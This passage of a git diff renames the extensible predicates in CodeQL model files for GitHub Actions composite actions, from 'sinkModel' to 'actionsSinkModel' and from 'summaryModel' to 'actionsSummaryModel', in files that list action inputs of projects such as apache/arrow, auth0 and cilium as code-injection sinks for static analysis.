b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2e..9e708bbcc898 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c15609..cfb67540b174 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e2..7186433e6d27 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e68..d39aafe162ff 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a4..a3b53b3ec960 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf3..2a35d22a10e0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900c..156d244ece2d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e0..fcda4b3dfec0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761fe..84877f57d8c2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a9..dcb93d013a09 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fcd..4776bb79067e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a3..2540e6a76ca7 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b7259..525064de6a97 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a14..b46d5a3ee6a8 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e51583902..631457c813e4 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a05928..44d9eb10a0dc 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762dbf..0d7f80698f57 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220e..84caa0434846 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005edc..f6aed253a21d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd87..1eac49617f22 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220a..1efa6815c280 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 53c6258551f4..91463a305dd9 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 62a4f2bbcd7b..7ef240ad999c 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 6dffbff40d31..db953acf5bc7 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index ac72bb9ebf04..7c1b01e14b5a 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index b3f1ca67eef7..37b67a933a3a 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 44f5ad660960..570a9bdd142c 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index c2e56f7e175c..8c1993c47ca6 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index 54d0c8b2fe09..ee0adaadb3e2 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index b1914e7a96b5..c127f03bb66d 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index dd66f206ee99..3b3d60fadd03 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 0c26f02e6d86..4dd43acd2c53 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 2ee13115d6d9..cb4bff25f9ac 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b66045..39a204389b99 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46a..6b4192c0c616 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7c..63c3fc89058b 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5b..72772ae47cf7 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43745006f8db..43cc1e0187ea 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 9289afb744f9..7c80b7e6eda6 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9729f9668138..1f7b69e6254a 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 92c259539443..7879a7903b41 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index c572c11ada4b..dbbd4c720ca4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index 1819f4f716e1..f99698b19924 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index 620100dd2d9a..a98a135d6b43 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index dfb08d260583..3ebb5e7acb32 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index a99ccc9e4776..b26aa6ea48b3 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 3a1e7b9d3366..683965e13d20 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index c15c1fac0068..9358c895f3c2 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index b0c787fa378f..8233e5066033 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 86278889fdf1..2aea730db7e3 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git 